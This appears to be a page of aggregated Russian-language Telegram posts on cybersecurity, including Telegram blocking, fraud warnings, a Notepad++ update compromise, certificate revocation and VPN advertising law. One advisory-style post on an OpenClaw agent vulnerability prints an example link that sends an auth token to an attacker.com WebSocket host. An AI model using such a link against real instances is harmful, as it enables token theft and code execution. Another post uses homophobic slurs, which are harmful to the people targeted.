Кибербезопасность — страница 11

Позиции сторон спора вокруг ограничения/блокировки Telegram, конечно, вполне предсказуемы. Безусловно, всякое государство стремится ограничить неподконтрольное ему информационное пространство.Россия одной из первых начала требовать от иностранных компаний "приземления", то есть создания представительств и обработки данных о гражданах РФ на территории РФ — очевидно, во многом по китайскому примеру. Потом уже подтянулся Евросоюз со своим Gaia-X и россыпью законов, американцы c CLOUD Act, турки и прочие, и вообще идея "суверенизации" информационного пространства начала набирать популярность.Это все понятно. С другой стороны, есть огромная информационная, торговая, общественная инфраструктура, выстроенная в телеграме. Есть и каналы влияния на иностранную аудиторию (русскоязычные каналы из России самые влиятельные, а на русском говорят и в странах бывшего СССР, и далеко за их пределами). Есть и интеграция в правовой режим: маркировка рекламы, маркировка каналов, реестр блогеров. Есть и удобство, привычка.И очередные замедления и блокировки — удар по всему этому, по привычной жизни людей, которые встроились в правовую систему, которые соблюдают законы и хотят быть частью глобальной площадки. Да, безусловно, тысячи людей были обмануты с помощью телеграма. При этом миллионы людей пользуются им каждый день, читают, постят, общаются и влияют на умы. И под сомнительным предлогом защиты тысяч обманутых — которых обманули бы хоть в максе, хоть в смс, хоть в телефонном звонке — миллионы людей хотят лишить привычной сферы, привычного приложения, привычной экосистемы — экосистемы, где глобальные наши находятся на лидирующих позициях в отличие от других заблокированных ресурсов.Я не думаю, что это просто оскорбление этих миллионов пользователей: что эти миллионы в нашей традиции перед лицом государственных интересов. Я думаю, что это буквально плохое с политической точки зрения решение, котороеа) снизит влияние российских лидеров общественного мнения за рубежом;б) затруднит коммуникацию российских предпринимателей с коллегами из других государств;в) приведет к очередному кризису доверия между жителями страны и органами власти;г) не приведет к повышению защищенности граждан.Причины можно найти всегда: неоплаченные штрафы, несоблюдение режима, медленная реакция на запросы. А вот смысл найти проблематично.Алексей Наумов. Внешпол — подписаться

Концепция FININT SPACE Друзья, всем привет! У меня был небольшой перерыв в работе, но время я потратил с пользой. Помните, пару месяцев назад я сказал, что хочу сделать полноценный Framework? Так вот, я наконец-то придумал как это сделать. Мы с вами будем создавать FININT SPACE.Суть максимально простая, хотя на её осмысление ушло довольно много времени. Сейчас в сети есть много разрозненных публикаций, где описываются какие-то отдельные детали поиска информации. Они, конечно, полезные, но они не решают проблемы системности, выверенности процесса. Я решил собрать это все вместе, дописать то, что еще не сказал и объединить в цифровой архив. По итогу должна получиться огромная библиотека сервисов, методов, способов поиска информации в рамках проведения финансовых исследований. FININT SPACE концептуально стоит на иерархической модели. На самом нижнем уровне модели архива рассполагаются сервисы. По каждому сервису представлено описание: зачем нужен, какие данные можно получить, какие задачи решает и т.д. Парочку я уже описал, чтобы у вас был референс, о чем я:Обзор сервиса: ЕГРЮЛОбзор сервиса: ЕГРИПОбзор сервиса: БФО ФНС Далее идут типовые задачи. Это по сути сборник примеров решения тех или иных задач, которые периодически возникают в рамках поиска и анализа данных. Задачи решаются как правило с помощью данных, полученных из сервисов, и их интерпретации. В ходе рассуждений я насчитал порядка 30 типовых задач, на которые можно разбить процесс исследования в зависимости от задачи и контекста. Тут тоже есть референс того как это может выглядеть:Способы поиска акционеров и бенефициарных владельцев Дальше из этих материалов будут собраны дорожные карты. Условно, та же проверка контрагента - это не одно действие, а цепочка шагов, каждый из которых на самом деле является типовой задачей. Примерно тоже самое при посике активов и пр. В совокупности такие дорожные карты и образуют тот самый Framework, о котором я говорил выше. Всё это будет в открытом доступе на домене finint.spaceРабота долгая, местами неблагодарная, но, честно говоря, это как раз тот вызов, который мне сейчас интересен. Хрен его знает, что из этого получится, но попытаться точно стоит.Дальше планирую раз в неделю делиться с вами тем, что уже добавлено в архив. Ну и плюс, конечно, про данный блог я тоже забывать не собираюсь, что-то буду писать и сюда.Я специально не стал пока прям супер много описывать, хочу услышать ваше мнение: удобно / не удобно. Может это вообще не очень нужный формат. Что думаете?

Принят закон, по которому криптовалюта теперь официально считается имуществом по УК и УПК.Что теперь может следователь?1️⃣ Изъять носитель (компьютер, флешку, «холодный» кошелёк)2️⃣ Перевести на безопасный адрес, если есть доступ к «горячему» кошелькуДействуют с участием специалиста.Кроме того, арест – это запрет всех операций, даже если кошелёк физически изъяли. Суд определяет формат прекращения операций – полностью или частично.Порядок учёта и хранения установит Правительство. Закон принят для исполнения рекомендаций ФАТФ и унификации практики.

Рано или поздно, но это должно было случиться.РФ давно уже является диктатурой, при этом уже более десяти лет как в ней начинают проявляться тоталитарные элементы. Причем, по очевидным причинам, начиная с 2022-го года этот процесс резко ускорился.А для тоталитаризма тотальный контроль за информационным пространством абсолютно необходим. КНРовский "Золотой Щит" - это не минимум, это - максимум либерализма для таких политических систем. И именно поэтому мне представляется вполне реалистичным вариант, когда РФ фактически перейдёт к Интранету.С которым никакие, даже отчасти независимые, мессенджеры несовместимы. Тем более, что путинские спецслужбы слишком хорошо научились использовать Телеграм для своих нужд, чтобы не понимать, как его могут использовать против них самих...

Вход в Альфа-Бизнес web банк по пин кодуБуквально пару дней назад Markswebb (напомню, это ребята, которые исследуют пользовательский опыт в интернет-банках) подсветили одну из последних фич нашего сервиса авторизации Альфа-ID - вход по пин-коду.Это был тихий запуск, возможно, потому что для нас, физиков, это абсолютно привычные паттерны входа. Мобильные операционки нас к этому приучили, мы это видим повсеместно в мобильных банках для физических лиц. Но для веб-среды это поведение нетипичное. Обычно авторизация происходит по логину и паролю, дополнительно используется любой из вторых факторов. А пин-код в B2B-банках я не встречал.А мы сейчас суперактивно развиваем всевозможные беспарольные способы авторизации. Используем технологию Passkeys, которая хранит в защищённом элементе вашего телефона или компьютера, либо внутри менеджера паролей, специальный авторизационный токен, позволяя сделать вход безопаснее и быстрее. Наша реализация пин-кода как раз является механизмом доступа к авторизационным ключам, которые хранятся внутри passkey-контейнера.Звучит, может быть, сложновато, но для пользователя всё очень просто. Подключение происходит буквально в несколько кликов. Впоследствии он просто вводит свой пин-код и попадает в наш интернет-банк.Мы заморочены по теме кибербезопасности. Все эти механизмы очень подробно разбирали с нашей ИБ.Если вы ЮЛ и пользуетесь нашим интернет-банком, наслаждайтесь. А всем остальным коллегам по цеху - копируйте у пионеров, имхо это очень удобно :)Всем отличного вторника 🙌

Похоже, что POSI попали в собственный прогнозСегодня ведущий публичный игрок сектора кибербезопасности опубликовал предварительные итоги деятельности за 2025 год. Таргет по отгрузкам составлял 33–35–38 млрд руб., однако рывка к верхней границе не произошло. По оценке менеджмента, объем оплаченных отгрузок, которые будут признаны в финансовой отчетности (до конца марта), составит 32–34 млрд руб. Компания выходит ровно на свой базовый прогноз — около 33 млрд. В годовом выражении рост продаж более 40% — сильный результат для масштаба бизнеса Positive Technologies. Говоря про 2026 год, менеджмент планирует также сохранить общий уровень расходов на уровне 2025-го. В сочетании с ростом отгрузок это должно приблизить компанию к целевой маржинальности по NIC на уровне ~30%. Дополнительно заявлено о намерении существенно снизить долговую нагрузку уже по итогам первого квартала 2026 года.Это позитивный сигнал: самый сложный период, похоже, позади, и у акций появился шанс на восстановление — с исторических максимумов 2024 года (выше 3000 руб.) бумаги снизились к уровням около 1100 руб. И это при лучших показателях, чем в целом по IT-сектору.Кибербезопасность остается в числе востребованных и наукоемких секторов с высоким порогом входа, а Positive Technologies обладает мировой экспертизой. Это не про «клепание мессенджеров» и не про отключение интернета — здесь действительно нужно уметь думать. Посмотрим на официальные результаты в апреле, но уже сейчас картина выглядит весьма обнадеживающе.#российский_рынокПодписывайтесь на bitkogan в MAX

Хакеры платили за вход на форум, который, похоже, держали спецслужбы. Ханипот за $500. На днях ФБР официально закрыло форум RAMP, повесив на домене свою любимую заглушку "This website has been seized". Для непосвященных это просто очередная победа над киберпреступностью. Но для тех, кто в теме, ситуация выглядит как финал грандиозной спецоперации, где главный злодей оказался двойным (или тройным) агентом.Админ форума под ником Stallman (не путать с Ричардом😁) - личность легендарная и мутная. Сообщество давно подозревало неладное... чувак открыто скупал доступы к критической инфраструктуре США, но... ничего не происходило. Компании не шифровались, данные не утекали. Складывалось ощущение, что он выкупал уязвимости, чтобы их патчить, а не эксплуатировать. При этом на других форумах (типа XSS) его банили за нарушение правил, но потом таинственным образом разбанивали, словно кто-то сверху звонил админу и просил не трогать нашего человечка Самое интересное всплыло сейчас. В официальных отчетах ФБР о закрытии форума нет ни слова про арест или розыск самого Сталлмана. Его имя просто исчезло из документов, будто форум управлял сам собой. Комьюнити уверено, что Сталлман это либо проект спецслужб, либо завербованный хакер Severa, который уже давно сотрудничает с федералами. Схема гениальная... создать ханипот для элиты рансомвари, собирать с них досье при регистрации (вход стоил $500 + деанон профилей), скупать опасные доступы, чтобы их не купили реальные хакеры-отморозки, а потом красиво закрыть лавочку, когда база данных наполнилась Получается, если в даркнете кто-то слишком громко кричит о своей крутости, нарушает понятия и при этом не садится годами, то скорее всего, он носит погоны под худи. А те, кто регистрировался на RAMP, думая, что попали в закрытый клуб, на самом деле добровольно заполнили анкету для майора. OpSec высшего уровня... вот вам и илита @zeroday_log

Внимание, мошенники!! Перешлите этот пост знакомым фотографам и любителям ходить на фотосессии 🙏🏻Я - владелец фотостудии ВИЗУАЛ (Visual Studio). С конца декабря нам стали поступать странные звонки и сообщения от клиентов, которые не бронировали нашу студию, и мы долго не могли понять в чем дело.Сейчас картина стала складываться, попасться может каждый!!Мошенники создали сайт якобы фотостудии - Visual Room https://stpetersburg.visual-room.top (возможно работает только с впн). Видимо создают левые аккаунты «фотографов» или взламывают реальных фотографов, и предлагают клиентам съемку в этой фотостудии. Бронь производится прямо на этом сайте, никаких переводов, всё выглядит чинно. В итоге человек теряет данные своей карты, деньги уходят + по последней информации мошенник пытаются оформить кредит. Прикладываю скрины от девушки, которая чуть не попалась, ее спас самозапрет на кредиты!Одной капли бдительности хватило бы, чтобы не попасться, но к сожалению попадаются(((1) сайт. Половина фоток на сайте просто сгенерированы в ИИ. Другая половина - просто картинки из интернета2) адрес. По этому адресу просто гараж, никакой студии там нет и не былоБолее того, у студии нет соцсетей, только сайт и левые аккаунты в телеграм, с которых и пишу жертвам.Когда люди начинают понимать, что их обманули, пытаются распутать клубок, натыкаются на нашу студию с похожим названием, некоторые даже с претензиями и угрозами, мы репутационно страдаем, но к сожалению ничем не можем помочь, так как не имеем никакого отношения к этим мошенникам(( советуем обращаться в полицию, но судя по всему так никто и не обратился.Пожалуйста, будьте внимательны при оплате чего-либо в интернете, проверяйте, что такая организация вообще существует, что этот способ оплаты официальный! Я общаюсь с предпринимателями, все с пониманием относятся, что клиенты перезванивают, переспрашивают, перестраховываются, уж лучше так🙏🏻

Утечки через ChatGPT и Gemini из российских компаний выросли в 30 разИсследование «Солар» (анализ трафика 150 компаний). Ожидаемо и похоже на правду. Что загружают сотрудники:— Презентации и стратегические планы— Финансовые отчёты и таблицы— Фрагменты исходного кода— Внутреннюю переписку и техдокументациюМасштаб проблемы:— В 40% российских IT-компаний используют ИИ— В 45% компаний есть отдельные ИИ-подразделения— При этом 60% компаний не имеют формализованных правил работы с ИИПубличные нейросети стали теневым ИИ (shadow AI) — сотрудники используют их для анализа данных, не задумываясь об утечках. Вывод: корпоративный ИИ-сервис с контролем данных — это уже не опция, а необходимость.Если нужно такое – пишите мне. 🔗 cnews.ru/news/top/2026-02-04_sotrudniki_rossijskih_kompanij#ИИ

В метро начнут проверять телефоны: что важно знать пассажирам Пассажиров московского метро в отдельных случаях могут попросить показать мобильный телефон. Что известно о новых проверках❓В Московском метрополитене пояснили, что в отдельных случаях пассажиров могут попросить включить мобильный телефон в рамках стандартных мер безопасности. Речь идёт не о постоянных проверках, а о выборочных мерах — как дополнении к уже действующим требованиям безопасности.⚡️Основание для таких действий — приказ Министерства транспорта РФ № 34 от 4 февраля 2025 года. Документ регулирует порядок досмотра на объектах транспортной инфраструктуры.Что именно могут проверить в телефоне❓По правилам досмотра пассажира могут попросить включить телефон и убедиться, что устройство работает. Просмотр переписок, фотографий, приложений или другого содержимого документом не предусмотрен. Но телефон могут попросить включить и показать, что он работает. Проверяют не содержимое устройства, а сам факт его наличия и работоспособности.Кто может проводить досмотр❓В метрополитене не уточняют, кто именно будет проводить такие проверки — сотрудники службы безопасности или полиция. Это зависит от конкретной ситуации и уровня действующих мер безопасности на станции. И непонятно пока, как быть, если гаджет разрядился. Что будет, если отказаться от досмотра❓Отказ возможен, однако он имеет последствия. Пассажиру вправе отказать в проходе в зону транспортной безопасности, то есть не пустить в метро. Здесь надо разграничить понятие досмотра от полицейского досмотра, для которого действуют совсем другие основания и правовые последствия. Там отказ могут квалифицировать как неповиновение законному требованию полицейского (статья 19.3 КоАП) и оштрафовать или назначить административный арест. А главное — зачем❓Проверка работающего телефона в метрополитене — это мера безопасности, призванная убедиться, что устройство не является замаскированным взрывным механизмом. Если телефон не включается, он может считаться подозрительным предметом, что создает риски для инфраструктуры и пассажиров. Мера направлена на исключение провоза запрещенных предметов.Такие правила действуют на всех видах транспорта и предусмотрены законодательством.💡 Совет от Bitkogan:На самом деле, такие проверки достаточно давно действуют на железнодорожных вокзалах и в аэропортах (но не всех и иногда выборочно). Да, это доставляет неудобства и замедляет очереди на проходе через рамку, но... такие времена. Главное — без паники! 👍 понимаю, покажу телефон, safety first🔥 понимаю, не хочу, но придется показать👎 не покажу, пойду пешком

Народная примета: если приложение говорит вам "произошла ошибка, пожалуйста, отключите VPN" или "с VPN приложение может работать хуже", этому приложению VPN не мешает совершенно.А если приложению VPN реально мешает, оно вам никогда об этом не скажет

#руди #cyberpand пост-предупреждение⚠️ про безопасность MoltBotя вас расстрою сразу: устанавливать openclaw/moltbot на свой компьютер сейчас — весьма небезопасная штукачто не так:• это early stage проект с полным доступом к вашей системе• если даете ему telegram, todoist, calendar — он держит все ваши токены• если ставите на личный комп — он может читать/писать любые файлы• если подключаете whoop, bank accounts, email — один exploit = всё утекло• код активно меняется, security audit не былоне торопите события если нет:1. понимания рисков2. технической возможности изолировать систему3. готовности потерять все данные к которым даёте доступесли все-таки хотите экспериментировать:✅ ставьте на отдельный VPS (не личный компьютер)✅ используйте отдельные test аккаунты для интеграций✅ не давайте доступ к production системам (рабочая почта, основной calendar, банк)✅ регулярно проверяйте какие токены и где хранятся (openclaw.json)✅ будьте готовы к тому что всё может сломаться или утечь❌ не давайте доступ к:• рабочей почте• банковским аккаунтам• production календарям с чувствительными встречами• приватным чатам с другими людьми без их согласия• корпоративным системаммой setup (full disclosure):я использую отдельный VPS, отдельный telegram аккаунт для бота, test todoist проект. whoop подключен но там нет особо чувствительных данных. личные journaling entries храню локально и никуда не синкаюэто эксперимент на грани. я готов к тому что что-то может утечь. вы — готовы?не уверен, не обгоняйесли читаете предыдущий пост и думаете "круто побежал ставить" — остановитесь. сначала подумайте что именно вы готовы рискнуть. потом ставьте изолированно. потом аккуратно подключайте доступыэто не enterprise-ready решение. это bleeding edge эксперимент. действуйте соответственно

​Срочно обновитесь, если вы любители расширений для браузера❗️В ноябре прошлого года в Chrome обнаружили серьёзную уязвимость в базовом коде, позволяющую вредоносным расширениям хозяйничать в браузере. Исправить её смогли только в январе. И если изменение настроек без ведома пользователя может огорчить или рассердить, то взлом менеджера паролей (а большинство людей хранит свои пароли в браузерах), создаёт реальную угрозу. Помимо этого пользователи в браузерах могут хранить данные карт, имена, адреса и прочие личные данные для автозаполнения форм. Им удобно, а как удобно мошенникам, когда всё хранится в одном месте😎Напоминает новый мессенджер, в который по замыслу авторов должны приходить все коды. Поэтому если уведут аккаунт, то даже звонить жертве не придётся, чтобы выманить код, он будет приходить сразу аферистам!Уязвимость касается всех браузеров на базе Chromium, а это не только Google Chrome, но и Microsoft Edge, Opera, Brave и Vivaldi. Поэтому если у вас отключено автоматическое обновление (на компьютерах это непросто сделать, desktop-версии обновляются в фоне), то обновитесь вручную.#браузеры #безопасность #конфиденциальность #личные_данные PRO компьютер

One-Click RCE + unauth API keys leak в OpenClaw/Clawdbot/Moltbot (CVE‑2026‑25253)Исследователи из Hunt.io разобрали потенциальные последствия эксплуатации уязвимости CVE‑2026‑25253 с оценкой CVSSv3 = 8.8 в OpenClaw и его форках (Clawdbot, Moltbot). Это browser‑automation фреймворки, связывающие LLM с браузером через Playwright. Эти агенты обычно имеют доступ к файловой системе и API‑ключам LLM, что автоматически делает последствия эксплуатации довольно критичными.🤦 Основная проблема:1️⃣ Ручка /api/export-auth доступна без аутентификации2️⃣ Позволяет выгрузить все сохранённые API‑токены провайдеров LLM (OpenAI, Claude, Google AI и др.)⚙️ Технические детали эксплуатацииOpenClaw до патча:1️⃣ Читает параметр gatewayUrl из query‑string2️⃣ Автоматически подключается к нему по WebSocket3️⃣ Без подтверждения пользователя отправляет auth‑токен на хост атакующего💫 Сценарий:1️⃣ Жертва кликает ссылку:https://victim-openclaw-ui/?gatewayUrl=wss://attacker.com/exfil2️⃣ OpenClaw сам подключается к WebSocket на хосте атакующего3️⃣ Токен мгновенно утекает атакующему4️⃣ Атакующий использует токен для подключения к Gateway API жертвы5️⃣ Меняет конфигурацию агента6️⃣ Вызывает привилегированные API → выполнение произвольного кода на хосте📊 Масштаб последствий 17 500+ публично доступных инстансов в интернете68.9% — Clawdbot Control22.3% — Moltbot Control8.8% — OpenClaw Control✅ Рекомендации: 1️⃣ Обновиться до версии OpenClaw v2026.1.292️⃣ Считать все ключи скомпрометированными, проверить балансы провайдеров LLM, провести ротацию ключей3️⃣ Использовать естественный интеллект 4️⃣ Не публиковать AI‑агентов в интернет

Странно, что в 2025 «мошенник» не стало словом года. Если судить по новостям, то это внушительный процент повестки. Цифровые археологи будущего, очевидно, выделят их в отдельную страту общества. Но беда пришла откуда не ждали - махинации уже и внутри нейросетей. Промпт-инъекции (атака на большие языковые модели с целью генерации вредоносного контента), по данным исследования «Лаборатории Касперского», станут угрозой 2026. Эти и другие страхи обсудим на вебинаре «Журналиста» в четверг. А пока можете почитать про одну из причин, почему мы такие тупые доверчивые.

The National Interest: в Калининграде находится "Великий балтийский глушитель"Так американский журнал называет российскую базу радиоэлектронной борьбы в составе системы противоспутникового оружия „Тобол”. Издание пишет, что эта система, вероятно, способна не только создавать широкомасштабные помехи спутниковым сигналам вплоть до их блокирования, но и заставлять спутниковую навигацию посылать ложные данные позиционирования, одновременно защищая российские объекты от электромагнитных помех со стороны иностранных государств.По утверждению исследователей, “Тобол„ нацелен на нарушение нормального функционирования системы Starlink, например, на возникновение помех приёму GPS-сигнала для точной настройки старлинковских терминалов.Попутно упоминается российское противоспутниковое оружие „Калинка”, которое, как утверждается, применял Иран для выведения из строя 40 000 терминалов Starlink, находившихся на руках у протестующих."Москва сможет использовать сеть „Тобол” для защиты от НАТО своих важных военных объектов в Калининграде", - резюмирует The National Interest.

Твой телефон - твоя ответственность Верховный суд РФ не нашел объективных данных о наличии в телефоне правонарушителя вредоносного ПО, которое бы генерировало и направляло оскорбления в мессенджере.Суть спора: с телефона гражданина в групповой чат мессенджера были направлены СМС-сообщения, содержащие высказывания оскорбительного характера в отношении родственницы одной из участниц чата. На основе данных скриншотов, объяснений и показаний потерпевшей в отношении гражданина было возбуждено дело об административном правонарушении по ч. 2 ст. 5.61 КоАП РФ, устанавливающей ответственность за оскорбление, в том числе совершенное публично с использованием информационно-коммуникационных сетей.Однако, нарушитель факт направления сообщений в чат отрицал, указывая в жалобе на то, что в его телефоне имелось вредоносное ПО, с помощью которого была сгенерирована переписка от его имени.Выводы суда: поскольку номер телефона принадлежит правонарушителю и находится в его пользовании, а данные о выбытии телефона с указанным номером из его пользования не представлены, с учетом иных сообщений в чате, а также содержания обращений, письменных объяснений и показаний потерпевшей, следует, что сообщения написаны и направлены правонарушителем. Оскорбление в групповом чате мессенджера отвечает признакам публичности, содержит негативную оценку личности потерпевшей, выраженную в неприличной, противоречащей общепринятым нормам морали и нравственности форме, унижает человеческое достоинство. Размещение оскорблений на страницах в социальных сетях, доступных для неопределенного круга лиц, либо в групповых чатах мессенджеров подлежит квалификации по части 2 статьи 5.61 КоАП РФ.Постановление ВС РФ от 21.01.2026 г. по делу № 66-АД26-1-К8 Дело, несомненно, "украсила" позиция правонарушителя: даже если поверить ему, не стоит забывать, что ответственность за гаджет несет владелец гаджета (кейсы про техсбои копим здесь).#кейснедели #практика

Официальный механизм обновления Notepad++ был взломан для распространения вредоносного ПО среди отдельных пользователей.

«Атака включала в себя компрометацию инфраструктуры, которая позволила злоумышленникам перехватывать и перенаправлять трафик обновлений, предназначенный для notepad-plus-plus.org», — сказал разработчик Дон Хо . «Компрометация произошла на уровне хостинг-провайдера, а не через уязвимости в самом коде Notepad++».

Это произошло чуть более чем через месяц после того, как Notepad++ выпустил версию 8.8.9, в которой была устранена проблема, из-за которой трафик от WinGup, программы обновления Notepad++, «периодически» перенаправлялся на вредоносные домены, что приводило к загрузке зараженных исполняемых файлов.В частности, проблема заключалась в том, как программа обновления проверяла целостность и подлинность загруженного файла обновления, что позволяло злоумышленнику, способному перехватывать сетевой трафик между клиентом обновления и сервером обновления, обманом заставить инструмент загрузить другой исполняемый файл.Считается, что это перенаправление было целенаправленным: трафик, исходящий только от определенных пользователей, направлялся на мошеннические серверы и загружал вредоносные компоненты. Предполагается, что инцидент начался в июне 2025 года, более чем за шесть месяцев до того, как он стал известен.

Злые китайские партийные хакеры похакали редактор Notepad++, когда-то достаточно популярный, а сейчас всё менее используемый.Ну, по версии разработчика, Дона Хо.Который в принципе с протестов в Гонконге забил на продукт и занялся напихиванием в каждую версию антикитайских лозунгов, потом совершил камингаут, потом сказал что у него есть украинский бойфренд и что он допускает его к редактированию кода.Так продукт в говно-то и скатился, т.к. ну а во что может скатиться продукт, если то ли программирующий его в этот момент хохла в булки прёт, то ли наоборот (кто их, пидарасов, разберёт) (для РКН - осуждаю пидарасов). Главное в новых версиях был новый лозунг, т.к. молодые стремились вписаться в любую актуальную для западной пропаганды тему (но не вышло, бюджеты надёжно попилены более ловкими людьми).Такая вот трагичная история. Пользуйтесь другими продуктами, которые при запуске не вываливают неубираемую 10 секунд табличку "ВОТ ТЫ В ГОНКОНГЕ СИДИШЬ СУДЯ ПО АЙПИШНИКУ А ТАМ НА БАРРИКАДАХ ДЕТЕЙ КЛЫКАМИ КИТАЙСКИЕ ОРКИ РВУТ ПРЯМО СЕЙЧАС". Редакторов для программистов - дофигищи.Счастья молодым, в следующий раз для привлечения внимания к угасающему продукту придумайте что не КПК вас взломала, а Медведев через телеграм. Это будет, как минимум, интригующе; детали у Саакашвили спросите - пишут что он ещё говорит, но всё реже и реже.

❓ Что меня спрашивали на собесе в финтех компаниюСегодня у меня история.Но сначала анонс 🚨Новая Подлодка будет про БЕЗОПАСНОСТЬ👉 Call For PapersЕсли есть что рассказать про Android-безопасность — пишите туда или мне в личку 🙂К истори!Пару лет назад я собесился в одну западную финтех-компанию (собес прошёл, но оффер я не принял, понтанулся 😅).Формат такой: дали тестовое, и потом 2 часа обсуждения решения. Знаю, что многие не любят тестовые, да и я сам тоже. Но такой был формат, я согласился. И там был упор на безопасность.Задание было такое:Написать приложение, где пользователь вводит текст и пароль, текст шифруется этим паролем, сохраняется максимально секьюрно на диске и потом может быть расшифрован обратно.Я делал так:- переводим пароль в ключ (Argon2id + соль). Потому что пароль не используем никогда напрямую, плохая практика. Для реализации берем org.signal:argon2- шифруем через AES-256-GCM с новым IV- храним соль + IV + зашифрованный текстДля хранения выбрал обычный файл в internal storage, а не EncryptedSharedPreferences. Специально, из-за известных кейсов потери данных через Keystore. Терять зашифрованные данные такое себе.Ну и потом весь разговор был не про алгоритмы, а про trade-off’ы и риски. Почему сделал так, а не иначе.Мое решение им зашло, ответы удовлетворили, предложили Senior Software Engineer 😅💬 А у вас было что-то подобное на собесах?#security #interview

Осторожно, мошенники.Друзья, второй день получаю в личку сообщения от знакомых и друзей, что мной интересуются разные аккаунты. Давайте разберемся с этим дерьмом раз и навсегда и на моем примере посмотрим, как правильно себя вести, если у вас спрашивают контакты ваших друзей.К вам приходят в личку с вопросом — я вас тут в комментариях у Вадима увидела, знакомы ли вы с Вадимом, что вы о нем думаете и можно ли у Вадима взять консультацию. И сразу контакты дайте пожалуйста.Легенды разные: кто-то у меня хочет поучиться, кто-то поработать, спрашивают мои контакты и собирают отзывы.Такого спроса на мою скромную и тихую личность не было с момента, как я попал в федеральный розыск. Шучу. Никогда.❗️Вас должно смутить, что человек не сходил по очевидному пути в описание канала, где есть прямой линк на мою личку, не забил мое имя в поисковик, но потратил кучу времени, зашел в комментарии и проанализировал, кто потенциально может быть со мной знаком и знать, как со мной связаться.В этом нет никакой логики, здесь уже первый тревожный звоночек.‼️Никогда и никому незнакомому не давайте непубличные контакты или подробности жизни своих друзей или коллег. Особенно, когда мотивированно просят конкретного человека.Предлог может быть любой — очень хочу с ним поработать, хочу с ним познакомиться, нужна его консультация.Вы имеете моральное право сказать не знаю и ничего не давать. Вы не личный секретарь.Но если хотите помочь — сходите к человеку и расскажите, что про него спрашивают, можно ли дать контакт.‼️Почему это плохо:Эти гамадрилы вот так аккуратно обогащают информацию о контакте.У одного они спросят личный мой номер и почту, второму напишут, что хотят мне сделать сюрприз-доставку и спросят адрес офиса.Третьего спросят про мои увлечения. На выходе — полное досье, которое ляжет в основу охренительно подробного скрипта в духеВадим Александрович, это вас беспокоит фсб.По адресу Лупкина д1 вы проживаете? Смотрите какая ситуация, до нас дошла информация, что в офисе, где вы работаете по адресу Пупкина д2 ... [вставьте свою легенду].Вопрос тихо мирно решать будем или по беспределу?Никогда и никому не давайте чужие контакты, если это не рабочий номер человека, который он завел специально для этих целей.И не важно — мошенники это, бывшие подрядчики человека, недовольные соседи или экзальтированные клиенты, которые хотят сделать сюрприз и отравить подарок в офис.

ИБ-компания Positive Technologies интегрировала свою LLM в инструмент тестирования веб-приложений PT BlackBox ScannerБольшая языковая модель дает владельцам веб-ресурсов рекомендации по устранению обнаруженных дефектов защиты. Она на естественном языке описывает причины появления уязвимостей и приводит примеры корректного кода и конфигураций.Как считают в Positive Technologies, с помощью нового инструмента специалисты без глубокой экспертизы в сфере кибербезопасности смогут принимать меры для исправления недостатков защиты. В компании отмечают, что бизнес-приложения на сетевом периметре остаются самой распространенной точкой входа хакеров в инфраструктуру компании — на них приходится 36% всех случаев.🔗Источник: https://safe.cnews.ru/news/line/2026-01-28_pt_blackbox_scanner_pomogaet_razrabotchikam***📎Positive Technologies в сентябре 2025 года добавила в виртуальную среду 🏷PT Sandbox ML-модель для выявления в сети неизвестного и скрытого вредоносного ПО.

💡 Portmaster: бесплатный open-source фаервол, который берет на себя всю тяжелую работу по защите сети.Он помогает вернуть контроль над соединениями приложений и восстановить приватность — видно, кто и куда стучится, и можно быстро всё заблокировать.Что умеет Portmaster:• перехватывает весь сетевой трафик• блокирует трекеры и нежелательные подключения• позволяет настраивать правила для каждого приложения• работает локально, без «облака»Отличный вариант, если хочешь прозрачности в сетевых запросах и меньше лишней телеметрии.GitHub: https://github.com/safing/portmaster

Сертификаты и доверие к ним Современный интернет, по крайней мере, то, что вы видите в браузере, практически полностью держится на «сертификатах».Если говорить совсем просто, то сертификат — это два криптографических ключа: один общедоступный (публичный), второй же известен только серверу (приватный). В самом сертификате также находится дополнительная информация: домен, для которого создан этот сертификат, время действия, кто выдал и так далее. Сложные математические вычисления, называемые асиметричным шифрованием, позволяют клиенту убедиться в том, что общение происходит с ресурсом, указанным в сертификате и никто не вмешивается в процесс.Проблема возникает, если приватный ключ попал в руки злоумышленников. Тогда они смогут выдавать себя за оригинальный ресурс и натворить злых дел: усыплять бдительность и красть пароли, например.Чтобы этого избежать придумали «отзыв сертификата»: отметку, что сертификат стал недействительным.Проблема в том, что при установлении соединения проверяется та информация о сертификате, которая доступна в момент подключения: адрес, время... Пометка «отозван» не появляется в уже существующих файлах сертификата. Как печать «недействителен» не может из ниоткуда появиться на бумагах у вас дома. Как тогда узнать, что сертификат отозван?1. В некоторых сертификатах добавляют пункт «проверить действительность сертификата можно там-то». И браузер прислушивается и ходит проверять. Это работает, но сторонний сервер, отвечающий «сертификат норм», будет знать, по каким сайтам вы ходите.2. Веб-сервер сам может периодически выяснять актуальность сертификата и отправлять эту информацию клиенту, чтобы тот никуда дополнительно не ходил.3. Есть списки отозванных сертификатов, с которыми можно сверяться. Идея тоже хороша, но с учётом размера современного интернета эти списки или огромные, или неполные.В общем-то, решение с отзывом сертификата довольно ожидаемое: математически сертификат «годен» до той даты, которая прописана внутри. А любые досрочные действия по отзыву — это надо ходить по разным сервисам и убеждаться, что сертификат всё ещё в почёте. Очень просто, но теперь я знаю.

🚧 ПЕРВОЕ ДЕЛО О РЕКЛАМЕ VPNНаверняка вы уже видели новость о том, что Вологодское УФАС рассматривает дело о ненадлежащей рекламе VPN-сервиса. Факт нарушения установлен, решается вопрос о штрафе. На что нам надо обратить внимание в этом кейсе? Рекламой была признана не информация, привлекающая внимания к конкретному VPN-сервису и призывающая воспользоваться им, а публикация со ссылкой на сервис. То есть рекламой признали информацию о VPN скорее, чем рекламу. Закон о рекламе запрещает рекламу

"программно-аппаратных средств доступа к информационным ресурсам, информационно-телекоммуникационным сетям, доступ к которым ограничен в соответствии с законодательством Российской Федерации".

Среди юристов популярна точка зрения, что если рекламировать VPN не как сервис для обхода блокировок, а как просто инструмент с бОльшим функционалом, то это не будет нарушением. Теперь мы понимаем, что вообще не факт. Дело было возбуждено не по жалобе гражданина, как обычно инициируются 90% дел, а по заявлению Центра по противодействию экстремизму УМВД. Это означает, что государство пристально отслеживает подобную информации и заинтересовано наказывать за ее распространение.Напомню, что Закон об информации предусматривает блокировку за распространение

"информации о способах, методах обеспечения доступа к информационным ресурсам и (или) информационно-телекоммуникационным сетям, доступ к которым ограничен на территории Российской Федерации".

